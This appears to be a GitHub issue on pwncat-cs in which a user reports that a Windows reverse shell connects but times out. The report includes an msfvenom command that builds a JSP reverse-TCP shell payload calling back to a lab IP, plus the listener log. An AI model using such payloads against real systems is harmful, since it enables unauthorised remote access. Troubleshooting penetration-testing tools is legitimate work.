You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I'm trying to get shell from windows system for the below exploit. But it seems like pwncat-cs issue, same is working well with nc listenere. I tried using different attack machines like Kali as well, but no luck. I tried sending nc to pwncat, still same issue. Not sure if it's target platform issue. Worth to look into it. Thank you.
I'm trying to get shell from windows system for the below exploit. But it seems like pwncat-cs issue, same is working well with nc listenere. I tried using different attack machines like Kali as well, but no luck. I tried sending nc to pwncat, still same issue. Not sure if it's target platform issue. Worth to look into it. Thank you.
MSF Venom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.139.10 LPORT=4444 -f war > reverse.war
pwncat-cs -m windows -lp 4444
[08:08:53] Welcome to pwncat 🐈! main.py:164
[08:09:26] received connection from 127.0.0.1:59726 bind.py:84
[08:09:56] connection failed: channel receive timed out: b''
The text was updated successfully, but these errors were encountered: